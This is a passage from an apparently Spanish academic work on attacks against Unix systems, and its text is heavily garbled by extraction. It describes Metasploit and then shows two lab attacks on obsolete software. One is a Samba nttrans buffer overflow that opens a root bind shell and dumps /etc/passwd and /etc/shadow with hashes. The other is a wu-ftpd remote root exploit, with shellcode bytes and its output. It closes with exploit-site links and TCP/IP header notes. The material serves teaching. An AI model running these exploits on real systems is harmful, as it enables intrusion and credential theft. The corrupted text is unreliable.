los e9"loits. El "roble a con los @?!s triviales es que son /cil ente identi/icables en un "a'load "or un 75,. Con este generador# es sencillo crear @?!s que /uncionen igual# "ero de longitud variable ' "seudoaleatorios. dE 4a!load% !roveen c8digo al Fra eIor6 que "uede ser ejecutado luego de que un e9"loit tenga 9ito al controlar el /lujo de ejecuci8n. M,F dis"one de unas cuantas o"ciones# ' "ara crear uno nuevo $ace /alta crear una clase que $erede de Ms/%%!a'load. 5e esta est dis"onible "revia ente. eE Auxiliar! 1odules% ,e trata de utilidades incluidas en el M,F que no tienen que ver directa ente con e9"lotar un objetivo# sino con actividades relacionadas% ejecutar un !ort ,can# "rovocar un 5o,*Jconocido en un so/tIare# loguearse en una Base de 5atos# interactuar con algGn ,ervicio# detectar la versi8n de un servidor# etc. #. 2rame@or: 4lu)ins% !ara di/erenciarlo de los los "lugins co o "iezas diseBadas "ara cualquier cosa con l. M,F dis"one de servicio en un soc6et# etc. 5e esta contenido de una tabla. 8dulos# "uede "ensarse a is o. El odi/icar el Fra eIor6 anera "ueden agregarse acciones "ersonalizadas# o so"ortar otra arquitectura que no

objetivo "uede ser cualquiera# 'a que en "ri era instancia se "er ite $acer 8dulos "ara cone9i8n a Bases de 5atos ;!ostgre,V:# M',V: ' ,V:ite># otro que ejecuta M,F co o un anera# el "lugin "ara cone9i8n a bases de datos "er ite# "or eje "lo# atacar un conjunto de $osts de acuerdo al

+.*.-. 7nter/aces de 2suario


En cuanto a las inter/aces $acia el usuario /inal# $a' cuatro "rinci"ales% *. L6nea de /omandos Dms=cliE% 7deal "ara ejecutar etas"loit co o "arte

de un scri"t e9terno# 'a que ace"ta los "ar etros de entrada# ejecuta lo que se le ordena "or la l)nea de co andos ' sale. Ler Consola @ro. -2. 2. /onsola Interactiva Dms=consoleE% Es la /or a s r"ida de usar Metas"loit. Bsica ente se ejecuta el /ra eIor6# ' se obtiene una l)nea de co andos donde se selecciona el&los e9"loits a ejecutar# el "a'load# las
*J- Ler Plosario% 5o,% 5enegaci8n de ,ervicio# "g. 2*.. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *-O de 22O

Ca")tulo +. ( +.*.El !ro'ecto Metas"loit

o"ciones ' se lanza el ataque. En la Consola @ro. --.se "uede observar la salida del co ando Cin/oD sobre un e9"loit# "ara ver el alcance ' caracter)sticas del is o antes de utilizarlo o no.

marcelo@saturno:~/src/6rame>or=& .1$ ./ms6cli K age: .;m f!"i TeDp"oitAname> Toption1@a"ue> -mo7e0 1111111111111111111111111111111111111111111111111111 3o7e ---9?:e"p 9.:ummarE 9O:ption 9#:7@an!e7 98:D. <@a ion 9P:aE"oa7 9T:arget 9#,:tion 9,:'e!6 9<:De!ute <Dp"oit 11111111 Name ---eDp"oit;b 7i; oft!art;mer!ante!A oft!art O@erf"o> eDp"oit;freeb 7;ta!a! ;Dta!a! 7Areport Cuffer O@erf"o> eDp"oit;'puD;"p7;!"eanupAeDe! ?...@ #uDi"iarE 111111111 Name ---auDi"iarE;a7min;ba!6upeDe!;7ump $emote Bi"e #!!e auDi"iarE;a7min;ba!6upeDe!;regi trE $egi trE #!!e auDi"iarE;a7min;!i !o;io A'ttpAaut'AbEpa #7mini trati@e #!!e ?...@ De !ription ----------=erita Ca!6up <De! &in7o> =erita Ca!6up <De! .er@er De !ription ----------3er!ante! .oft,art ,H8 GT#,#,.D T1 +.1.( report9: ?P-KG 2PD ,omman7 <De!ution De !ription ----------/ouJre "oo6ing at it babE` .'o> information about t'i mo7u"e .'o> a@ai"ab"e option for t'i mo7u"e .'o> a@ai"ab"e a7@an!e7 option for t'i mo7u"e .'o> a@ai"ab"e i7 e@a ion option for t'i mo7u"e .'o> a@ai"ab"e paE"oa7 for t'i mo7u"e .'o> a@ai"ab"e target for t'i eDp"oit mo7u"e .'o> a@ai"ab"e a!tion for t'i auDi"iarE mo7u"e $un t'e !'e!6 routine of t'e e"e!te7 mo7u"e <De!ute t'e e"e!te7 mo7u"e

,i !o 8O. ?TTP Knaut'oriOe7

Consola -2% Ejecuci8n de Metas"loit sin "ar etros en su versi8n de :)nea de Co andos

-. Inter=a3 Mr=ica de Usuario Dms=)uiE % !ara quienes dis"onen de o "re/ieren la inter/az gr/ica# ejecutar varios trabajos a la vez# etc.# Metas"loit dis"one de una versi8n gr/ica ulti"lata/or a ;7lustraci8n **>. Es bastante atractiva# r"ida e intuitiva co o "ara considerarla "or sobre la versi8n de consolaH ade s "osee la ca"acidad de ejecutar varias CconsolasD de M,F al is o tie "o ' desde la P27 is a. 1. Aplicaci-n He( Dms=@e(E% ,u ndose a la C odaD actual de las
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *-0 de 22O

Ca")tulo +. ( +.*.El !ro'ecto Metas"loit

CA"licaciones 4ebD# Metas"loit introduce una

u' c8 oda ' verstil

anera de correr Metas"loit en /or a re ota o local# s8lo a"untando un navegador a su ,ervidor 4eb ' A"licaci8n e bebidos ;7lustraci8n **>.

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *1. de 22O

Ca")tulo +. ( +.*.El !ro'ecto Metas"loit


marcelo@saturno:~/src/6rame>or=& .1$ ./ms6console A A A F F 9A:A AAAA AAAAF FA AAAA AAA AAAA F F AAA AF FA F [ ; A : A:; A F;AAA: A [F F; A [F F A: F F F 9 9; ;F FA9 9 F FAAA F F F F F FAF F F FAA FAFAFAF[AAAA:[AAA:AFFA9AAA;F FFA;FAF[AAA;FAF[AAA: FAF 1P -- --1P -- --11ms6 ' m f @3.1-re"ea e (69 eDp"oit - 11) paE"oa7 17 en!o7er - 6 nop +6 auD

in6o e,ploit/linu,/ids/snortbopre .nort Ca!6 Orifi!e Pre-Prepro!e 5365 No C.D 2i!en e or $emote <Dp"oit

Name: =er ion: P"atform: Pri@i"ege7: 2i!en e:

Pro@i7e7 bE: 5ai_ern 2au TD>ing ImE e!.org> #@ai"ab"e target : 87 Name -- ---0 Debian 3.1 .arge Ca i! option : Name ,urrent .etting -----------------$?O.T $PO$T 90)0 PaE"oa7 information: .pa!e: 1073 #@oi7: 1 !'ara!ter De !ription: T'i mo7u"e eDp"oit a ta!6 o@erf"o> in t'e Ca!6 Orifi!e pre-pro!e or mo7u"e in!"u7e7 >it' .nort @er ion (.+.04 (.+.14 (.+.(4 an7 (.+.3. T'i @u"nerabi"itE !ou"7 be u e7 to !omp"ete"E !ompromi e a .nort en or4 an7 >ou"7 tEpi!a""E gain an atta!6er fu"" root or a7mini trati@e pri@i"ege . $eferen!e : 'ttp:;;>>>. e!uritEfo!u .!om;bi7;15131 'ttp:;;!@e.mitre.org;!gi-bin;!@ename.!gi*name1(005-3(5( 'ttp:;;Dfor!e.i .net;Dfor!e;a"ert ;i7;(07 ms6 ' sIo> e,ploits $equire7 -------Ee Ee De !ription ----------T'e target a77re T'e target port

Consola --% Metas"loit corriendo en /or a interactiva desde consola

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *1* de 22O

7lustraci8n **% 7nter/az Pr/ica ' 4eb de Metas"loit# res"ectiva ente

Ca")tulo +. ( +.2.Eje "los de Ataques con E9"loits

+.2. Eje "los de Ataques con E9"loits


En este caso se "resentarn dos ataques con e9"loits re otos de eje "lo# $ec$os en un a biente de "ruebas es"ecial ente creado "ara este trabajo. :a idea es ostrar c8 o /uncionan# utilizando versiones viejas ' discontinuadas de so/tIare. !ara ver el c8digo /uente de a bos e9"loits# ver Ane9o 5# "g. 2.+.

+.*.*. Atacando ,a ba con Metas"loit


:a siguiente ;Consola -1> es una sesi8n de ataque a un ,ervidor P@2&:inu9 <ed=at versi8n 0# ejecutando ,a ba*J1# /uncionando co o servidor de arc$ivos e i "resoras de una red :A@ t)"ica.
marcelo@saturno:~/src/6rame>or=&2.0$ sudo ./ms6console K ing Term::$ea72ine::.tub4 8 ugge t in ta""ing omet'ing better 9ie Term::$ea72ine::Hnu: A A A A F F F F 9A: F A AA AAA AAAF FA AA A AAA A AA F F AAA AF FA F JA c A [ ; A [ AA; Ac ; AAF JA [F F; A [F F AAF F F F F F F AA; FF 9AF [AA [ FA: F F 9A: F F FA FAF FAF FAF[AAAF[AA[AA4AFAAA; .AA;FAF[AAA;FAF[AAF F F FAF P -- --1- m f!on o"e @(.7 -157 eDp"oit ms6 ' use sambaNnttrans ms6 sambaNnttrans ' sIo> options <Dp"oit Option 111111111111111 <Dp"oit: -------require7 optiona" require7 Name ------$?O.T T?$<#D. $PO$T Defau"t ------(5 139 De !ription --------------------------------T'e target a77re T'e number of !on!urrent attempt T'e amba port - 76 paE"oa7 0

Target: Target Not .pe!ifie7 ms6 sambaNnttrans ' set /K4-2 192.168.0.200 $?O.T -> 19(.16).0.(00 ms6 sambaNnttrans ' sIo> targets .upporte7 <Dp"oit Target 1111111111111111111111111

*J1 ,a ba es un so/tIare "ara 2ni9 que i "le enta el "rotocolo ,MB&C7F,# que es el que utiliza 4indoIs "ara co "artir arc$ivos e i "resoras en una <ed. Ade s# "er ite integrar estaciones de trabajo 2ni9 a redes 4indoIs. 2<:% $tt"%&&III.sa ba.org Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *12 de 22O

Ca")tulo +. ( +.2.Eje "los de Ataques con E9"loits

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *1- de 22O

Ca")tulo +. ( +.2.Eje "los de Ataques con E9"loits

0 1 ( 3 + 5 6 7

.amba .amba .amba .amba .amba .amba .amba .amba

,omp"ete Crute Bor!e (.0 Crute Bor!e (.( Crute Bor!e (.0.6 ; $e7 ?at 6.( (.0.7 ; $e7 ?at 7.0 (.(.1 ; $e7 ?at 7.( (.(.5 ; $e7 ?at ).0 (.(.+ ; ."a!6>are ).1

ms6 sambaNnttrans ' set 2%/BC2 2 T#$H<T -> ( ms6 sambaNnttrans ' sIo> *%874%)3eta p"oit Brame>or6 K ab"e PaE"oa7 111111111111111111111111111111111111 "inuDAia3(Aa77u er "inuDAia3(Abin7 "inuDAia3(Abin7A tg "inuDAia3(AeDe! "inuDAia3(Afin7re!@ "inuDAia3(Afin7re!@A tg "inuDAia3(Afin7 o!6 "inuDAia3(Are@er e "inuDAia3(Are@er eAimpuritE Kp"oa7;<De!ute "inuDAia3(Are@er eA tg "inuDAia3(Are@er eAu7p 2inuD 2inuD 2inuD 2inuD 2inuD 2inuD 2inuD 2inuD 2inuD 8#3( 8#3( 8#3( 8#3( 8#3( 8#3( 8#3( 8#3( 8#3( #77 K er Cin7 .'e"" .tage7 Cin7 .'e"" <De!ute ,omman7 $e!@ Tag Bin7 o!6 .'e"" .tage7 Bin7 o!6 .'e"" .r!Port Bin7 o!6 .'e"" $e@er e .'e"" $e@er e 8mpuritE

2inuD 8#3( .tage7 $e@er e .'e"" 2inuD 8#3( $e@er e KDP .'e""

ms6 sambaNnttrans ' set *%874%) linu,Nia 2Nbind P#/2O#D -> "inuDAia3(Abin7 m f ambaAnttran 9"inuDAia3(Abin7: > eDp"oit -Q0 .tarting Cin7 ?an7"er. -Q0 .tarting atta!6 again t target .amba (.( Crute Bor!e -Q0 #tta!6 >i"" u e (5 t'rea7 >it' )19 tota" attempt -Q0 -Q0 -Q0 -Q0 -Q0 < tab"i 'ing (5 !onne!tion9 : to t'e target... --- .etting up t'e .3C e ion... --- < tab"i 'ing tree !onne!tion... --- .en7ing fir t nttran !omponent... --- ,omp"ete7 range 0D0)300000:0D0)(f63!0

-Q0 Crute for!e 'ou"7 !omp"ete in approDimate"E 16.0 minute -Q0 < tab"i 'ing (5 !onne!tion9 : to t'e target... -Q0 --- .etting up t'e .3C e ion... -Q0 --- < tab"i 'ing tree !onne!tion... -Q0 --- .en7ing fir t nttran !omponent... -Q0 --- ,omp"ete7 range 0D0)(f63!0:0D0)(e!7)0 ?...@ -Q0 Crute for!e 'ou"7 !omp"ete in approDimate"E 7.( minute -Q0 < tab"i 'ing (5 !onne!tion9 : to t'e target... -Q0 --- .etting up t'e .3C e ion... -Q0 --- < tab"i 'ing tree !onne!tion... -Q0 --- .en7ing fir t nttran !omponent... -Q0 --- ,omp"ete7 range 0D0)(+67+0:0D0)(3!b00 ?U@ Bot connection 6rom 192.168.0.2:1121 M&' 192.168.0.200:.... id ui7109root: gi7109root: group 1999nobo7E: uname &a 2inuD "o!a"'o t."o!a"7omain (.+.(0-6 N1 T'u Beb (7 10:01:19 <.T (003

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *11 de 22O

Ca")tulo +. ( +.2.Eje "los de Ataques con E9"loits


i6)6 at'"on i3)6 HNK;2inuD cat /etc/issue $e7 ?at 2inuD re"ea e 9 9.'ri6e: 5erne" [r on an [m cat /etc/pass>d root:D:0:0:root:;root:;bin;ba ' bin:D:1:1:bin:;bin:; bin;no"ogin 7aemon:D:(:(:7aemon:; bin:; bin;no"ogin a7m:D:3:+:a7m:;@ar;a7m:; bin;no"ogin "p:D:+:7:"p:;@ar; poo";"p7:; bin;no"ogin En!:D:5:0: En!:; bin:;bin; En! 'ut7o>n:D:6:0: 'ut7o>n:; bin:; bin; 'ut7o>n 'a"t:D:7:0:'a"t:; bin:; bin;'a"t mai":D:):1(:mai":;@ar; poo";mai":; bin;no"ogin ne> :D:9:13:ne> :;et!;ne> : uu!p:D:10:1+:uu!p:;@ar; poo";uu!p:; bin;no"ogin operator:D:11:0:operator:;root:; bin;no"ogin game :D:1(:100:game :;u r;game :; bin;no"ogin gop'er:D:13:30:gop'er:;@ar;gop'er:; bin;no"ogin ftp:D:1+:50:BTP K er:;@ar;ftp:; bin;no"ogin nobo7E:D:99:99:Nobo7E:;:; bin;no"ogin ?...@ mar!e"o:D:500:500:3ar!e"o Bernan7eO:;'ome;mar!e"o:;bin;ba ' cat /etc/sIado> root:M1M?=U;.?iNM(@gBg3bu+O#U1p_<b<2!#0:1+003:0:99999:7::: bin:Q:1+003:0:99999:7::: 7aemon:Q:1+003:0:99999:7::: a7m:Q:1+003:0:99999:7::: "p:Q:1+003:0:99999:7::: En!:Q:1+003:0:99999:7::: 'ut7o>n:Q:1+003:0:99999:7::: 'a"t:Q:1+003:0:99999:7::: mai":Q:1+003:0:99999:7::: ne> :Q:1+003:0:99999:7::: uu!p:Q:1+003:0:99999:7::: operator:Q:1+003:0:99999:7::: game :Q:1+003:0:99999:7::: gop'er:Q:1+003:0:99999:7::: ftp:Q:1+003:0:99999:7::: nobo7E:M1Mu!6;!3NeMeC3D?.p<#(P6&159pq56O;:1+003:0:99999:7::: ?...@ mar!e"o:M1M tg6;OimMH&7gC9KG,B5_t71<p+t.g.:1+003:0:99999:7::: -Q0 <Diting Cin7 ?an7"er. ms6 sambaNnttrans!linu,Nia 2Nbind" ' e,it marcelo@saturno:~/src/6rame>or=&2.0$

!ara el ataque se utiliz8 Metas"loit versi8n 2.+# la Glti a de la serie 2.9# 'a que si bien Metas"loit -.* conten)a este e9"loit en su base de datos# el ataque no /ue e9itoso en las "ruebas. Cabe aclarar que Meta"s"loit -.* tiene algunos igrar los que /alten o a "liar e9"loits que no estn del todo co "letos ;co o ste> con res"ecto a la versi8n anterior# ' el equi"o de desarrollo aGn trabaja en los que estn en cuanto a caracter)sticas. ,e "uede ver que el e9"loit en M,F v2.+ se lla a Csa baUnttransD# ' corres"onde a un ataque de Bu//er ?ver/loI detallado en el CLE(2..-(..O5 *J5 '
*J5 2<: del <e"orte% $tt"%&&cve. itre.org&cgi(bin&cvena e.cgiYna ea2..-(..O5 Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *15 de 22O

Ca")tulo +. ( +.2.Eje "los de Ataques con E9"loits

Bugtraq 75 +*.J*JJ# "ublicado el *5 de Marzo de 2..-. :a utilizaci8n de M,F v2.+ es idntica a la de la serie -.9% ,e selecciona el e9"loit ;Cuse sa baUnttransD> ,e ven las o"ciones requeridas "or el is o ;Cs$oI o"tionsD> ,e establecen las o"ciones a utilizar ;Cset <=?,FD# Cset FA<PEFD> ,e establece el "a'load ;Cset !AK:?A5 linu9Uia-2UbindD>% Este "a'load genera un ini(servidor con un s$ell en el "uerto 1111 del objetivo# con odo los "er isos del usuario que ejecuta el "roceso e9"lotado ;,a ba se ejecuta nor al ente co o usuario root>. Es si ilar a un netcat en :7,FE@# co o se describi8 en la Consola 2*# "g. 0*.

:uego de la es"era ;algunos

inutos># el atacante "uede conectarse al is o.

objetivo ;*02.*JO...2..%1111># con lo que se accede al s$ell del

,e ejecutan algunos co andos# "ara ver qu "er isos se tienen# a qu ,? corres"onde# ' se uestran los arc$ivos de usuarios ' de "assIords.

+.*.2. E9"lotando un ,ervidor FF!


A continuaci8n ;Consola -1> se incor"orado# el 42(FF!5*J+.
marcelo@saturno:~/src/mil>0rm/plat6orms/linu,/remote$ ./e,ploit&6tp.bin &<< &t 10 &d 192.168.0.100 7350>urm - D)6;"inuD >uftp7 T1 (.6.1 remote root 9@er ion 0.(.(: team te o 9t'D bnut 4 toma 4 EnnergE.net `:. N trEing to "og into 19(.16).0.100 >it' 9ftp;moOi""aI: ... !onne!te7. N banner: ((0 r'6( BTP er@er 9=er ion >u-(.6.091: 3on Beb () 10:30:36 <.T (000: rea7E. u ing 56 bEte 'e""!o7e: ;Q 'e""!o7e4 56 bEte Q; 90 90 90 90 90 90 90 90 90 90 90 90 31 7b +3 b) F ............1.,. 0b 7+ 51 0b (7 01 01 01 01 50 )9 e1 6a 0+ 5) )9 F .tR.-....P..Y.G. !( !7 )0 eb 0e 31 7b f7 e3 fe !a 59 6a 03 5) !7 F .....1...../Y.G. )0 eb 05 e) e7 ff ff ff F ........ NNN T#$H<T: $e7?at 6.( 9Uoot: ->u-ftp7-(.6.0-3.i3)6.rpm0 N 1. fi""ing memorE gap P&D pat' 91:: (57 V;V i !urrent 7ire!torE.

uestra otra sesi8n de ataqueH esta vez se

trata de un viejo servidor <ed =at :inu9 versi8n J.2# ' su servidor FF!

*JJ Ler 2<:% $tt"%&&III.securit'/ocus.co &bid&+*.J *J+ ,itio o/icial del so/tIare% $tt"%&&III.Iu(/t"d.org& Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *1J de 22O

Ca")tulo +. ( +.2.Eje "los de Ataques con E9"loits


N (. ;Q 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 f0 eb eb eb eb eb eb eb eb eb eb eb 90 )9 !a en7ing bigbuf P fa6e!'un6 bui"7ing !'un6: 9-0D0)06e1a00 1 Dpbuf4 +9+ bEte Q; 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 ff ff ff f! ff ff ff 9+ e1 06 0) 7) 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! 90 90 90 90 90 90 90 90 31 7b +3 b) 0b 7+ 51 0b (7 01 01 e1 6a 0+ 5) )9 !( !7 )0 eb 0e 31 7b 59 6a 03 5) !7 )0 eb 05 e) e7 ff ff

0D0)07f77): in (3) bEte 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 f7 0! 0! 0! 0! 0! 0! 0! 0! 0! 0! 90 01 f7 ff 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 07 eb eb eb eb eb eb eb eb eb eb 90 01 e3 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0) 0! 0! 0! 0! 0! 0! 0! 0! 0! 0! 90 50 fe F F F F F F F F F F F F F F F F F F F F F F F F F F F F F F F 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 ............D... ................ ................ ................ ................ ................ ................ ................ ................ ................ ................ ................ ..1.,..tR.-....P ..Y.G......1.... ./Y.G.........

pa7!'un6A iOe 1 0D0000001) 11> 15 N 3. triggering free9g"ob"i t-10: N N eDp"oitation u!!ee7e7. en7ing rea" 'e""!o7e N en7ing etreui7;!'root;eDe!@e 'e""!o7e N pa>ning 'e"" NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNN ui7109root: gi7109root: egi71509ftp: group 1509ftp: 2inuD r'6( (.(.1+-5.0 N1 Tue 3ar 7 (1:07:39 <.T (000 i*)6 un6no>n

p>d ;'ome;ftp ls cd / p>d ; ls bin "o tPfoun7 boot mnt 7e@ opt et! pro! 'ome root "ib bin tmp u r @ar Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *1+ de 22O uname &a 2inuD r'6( (.(.1+-5.0 N1 Tue 3ar 7 (1:07:39 <.T (000 i*)6 un6no>n id ui7109root: gi7109root: egi71509ftp: group 1509ftp:

Consola -1% Ataque a un servidor FF! con un e9"loit "Gblico

Ca")tulo +. ( +.2.Eje "los de Ataques con E9"loits

:a vulnerabilidad a"rovec$ada se encuentra detallada en el CE<F Advisor' ;CA(2..*(--*JO ' CLE(2..*(.55.*J0># ' se "uede clasi/icar co o un error en el anejo de los strings enviados "or el usuario.

+.-. Enlaces 2tiles


7nternet tiene uc$)si a in/or aci8n sobre e9"loits# desde su anera de s crearlos $asta los c8digos /uente is os# "ero un listado de los sitios

i "ortantes al res"ecto incluir)a a los siguientes% 1ilH$rm% ,itio que tiene en su "gina "rinci"al un listado de los Glti os e9"loits "ublicados# ade s de una base de e9"loits se encuentra en constante actualizaci8n. !gina !rinci"al% $tt"%&& ilI.r .co & Colecci8n de e9"loits% $tt"%&& ilI.r .co &s"loits& ilI.r .tar.bz2

u' i "ortante# que

&ac:Trac:% Es una distribuci8n de :inu9 es"ecial ente creada "ara !enetration Festing. $tt"%&&III.re ote(e9"loit.org&bac6trac6.$t l Damn Bulnera(le Linux% Esta es una distribuci8n de :inu9 en /or ato de :ive(C5# que es total ente insegura a "ro"8sito# ' que ade s inclu'e uc$os e9"loits# cursos ' $erra ientas "ara e9"lotarse a s) $tt"%&&III.da nvulnerablelinu9.org& is o.

4ac:et Atorm Aecurit!% ,itio con in/or aci8n ' $erra ientas de de/ensa "or un lado ' e9"loits "or el otro. $tt"%&&"ac6etstor securit'.org& Learn Aecurit! 0nline% 7nclu'e cursos# in/or aci8n ' varios

CCrac6MeD*+. "ara co enzar a a"render sobre $ac6ing. $tt"%&&III.learnsecurit'online.co &inde9."$"

T9e Ft9ical 8ac:er Net@or:% Co unidad# noticias ' recursos sobre =ac6ing Etico. $tt"%&&III.et$ical$ac6er.net& /rac:mes.de% ,itio que contiene una Base de Crac6Mes entre otros. $tt"%&&III.crac6 es.de& s que

interesante# clasi/icados "or nivel# "lata/or a ' lenguaje de "rogra aci8n#

*JO 2<: del aviso% $tt"%&&III.cert.org&advisories&CA(2..*(--.$t l *J0 2<:% $tt"%&&cve. itre.org&cgi(bin&cvena e.cgiYna eaCA@(2..*(.55. *+. 2n CCrac6MeD es un C"roble a de crac6ingD# general ente en /or a de arc$ivo binario# "ara ro "er ' e9"lotar su C"rotecci8nD. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *1O de 22O

Ca")tulo +. ( +.-.Enlaces 2tiles

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *10 de 22O

Ane9o A. ( Ane9o A. !ila de !rotocolos FC!&7!

Anexo A. 4ila de 4rotocolos T/4GI4


En este ane9o se "retende describir in/or aci8n del conjunto de "rotocolos s utilizados que giran alrededor de FC!&7!# co o "or eje "lo 7!# FC!# 25!# etc.# a /in de tenerlos a ano al leer el docu ento ' que sirva de co "le ento.

A.*. !rotocolo 7!v1 ( Encabezado


(it 466set 0 2 6. 96 128 160 (its 0V =er ion .V0 8V11 16V18 19V 1 2ong. <n!abeOa7o Tipo 7e .er@i!io 2ongitu7 Tota" en CEte B"ag 8D 7e Proto!o"o Off et 7e" Bragmento ,'e!6 um 7e" <n!abeOa7o

87entifi!a7or 7e .e!uen!ia Time to 2i@e Dire!!i%n 8P Origen - .our!e #77re Dire!!i%n 8P De tino - De tination #77re Op!ione 9op!iona":

160/192T Dato

Fi"o de ,ervicio ;segGn <FC +0*>%


(its 0&2 Pre!e7en!ia (its &6 (it 0 $e er@a7o Tipo 7e .er@i!io De"aE F T'roug'put F $e"iabi"itE

Fi"o de ,ervicio ;actualizado en el 2..*# segGn <FC -*JO>%


(its 0&1 ,ampo D. - Diff.er@ (its 6&0 ,ampo <,N \ Notifi!a!i%n 7e ,onge ti%n <Dp"Z!ita

Flags%
(it 0 $e er@a7o (it 1 No Bragmentar - DB (it 2 3] Bragmento - 3B

5escri"ci8n breve de los ca "os S47R7U7!v1T%


Bersi-n ;1 Bits>% "ara 7!v1 ;este caso> es igual a .9.*... Lon)itud del Fnca(e3ado ;7=: N 6nternet Header >engt > ;1 bits>% Cantidad de "alabras de -2 bits que ocu"a el encabezado# li itando el encabezado total ;ca "os obligatorios _ o"cionales> a J. b'tes. Lon)itud Total en &!tes ;*J bits>% Contiene la longitud total del datagra a# inclu'endo encabezado ' "a'load. Identi=icador de Aecuencia ;*J bits># 2la)s ;- bits>% Contiene un nG ero Gnico de identi/icacion# necesario cuando el datagra a es "arte de un

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *5. de 22O

Ane9o A. ( A.*.!rotocolo 7!v1 ( Encabezado

datagra a

s grande "ero /rag entado anterior ente# circunstancia en que 9i o de saltos "or los cuales este

se utilizan los bits de /rag entaci8n del ca "o Flags.

Time To Live ;FF:> ;O bits>% :) ite "aquete "uede ser enrutado.

ID de 4rotocolo ;O Bits>% 75 del "rotocolo enca"sulado en el "a'load# de acuerdo al listado descri"to en el <FC +0.. !or eje "lo# 7CM!a.9.*# FC!a.9.J ' 25!a.9**. /9ec:sum ;*J bits>% <esultado del algorit o de correcci8n de errores a"licado al encabezado. Direcci-n I4 0ri)en ;-2 bits>% 1 b'tes# cada uno es"eci/icando de . a 255 la direcci8n 7! origen. !or eje "lo% *02.*JO...J. a .9C. .9AO .9.. .9-C. Direcci-n I4 Destino ;-2 bits>% 1 b'tes# cada uno es"eci/icando de . a 255 la direcci8n 7! destino.

A.2. !rotocolo FC! N Encabezado%


(it o66set 0 2 6. 96 128 160 (its 0V .V0 8V11 16V 1 Puerto De tino Puerto Origen \ .our!e Port Nro. 7e .e!uen!ia - .equen!e number N^mero 7e #,5 - #!6no>"e7gment number Off et 7e Dato ,'e!6 um Op!ione 9op!iona": $e er@a7o ,&$ <,< K$H #,5 P.? $.T ./N B8N &in7o> .iOe Puntero Krgente

160/192T Dato

5escri"ci8n breve de los ca "os S47R7UFC!T%

4uerto 0ri)en ;*J Bits>% 2 B'tes indicando el "uerto de origen del seg ento FC!. !or eje "lo# 5O.+*a.9E2 .95+. 4uerto Destino ;*J Bits>% 2 B'tes indicando el "uerto destino del seg ento FC!. !or eje "lo# 22a.9.. .9*J. @G ero de ,ecuencia ;-2 Bits>% 5ebe su e9istencia al esque a de interca bio de datos /iable de FC!. Fiene un doble rol%

,i el bit de ,K@ est activado ;es igual a .9*># entonces este nG ero es el 7,@ ;6nitial Secuence Gumber N @G ero de ,ecuencia 7nicial> ' el "ri er b'te de datos es el nG ero de secuencia s uno. ,i no# entonces el "ri er b'te de datos es el nG ero de secuencia.

@G ero de ACR ;-2 Bits>% ,i el bit de ACR est activado ;.9*># entonces el

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *5* de 22O

Ane9o A. ( A.2.!rotocolo FC! N Encabezado%

valor de este ca "o es el siguiente b'te que el rece"tor est es"erando.

?//set de 5atos ;1 Bits>% Fa aBo del encabezado en "alabras de -2 bits. El )ni o es de 5 "alabras ;*J. bits a 2. b'tes># ' el "alabras a .9.**.. 9i o es de *5 ;1O. bits a J. b'tes>. !or eje "lo# si el encabezado es de 21 b'tes a *02 bits a J Flags ;O Bits>%

C4< ' ECE% ,irven "ara el <FC -*JO.

anejo de la congesti8n descri"to en el

2<P% 7ndica que el ca "o de "untero a datos urgentes es signi/icativo. ACR% 7ndica que el ca "o de @G ero de ACR es signi/icativo. !,=% Funci8n de Pus . <,F ;:eset>% <einicia la cone9i8n. ,K@% ,incroniza nG eros de secuencia# indica el inicio de la cone9i8n. F7@% Finalizaci8n de env)o de datos. ecanis o FC! de Cventanas deslizantesD.

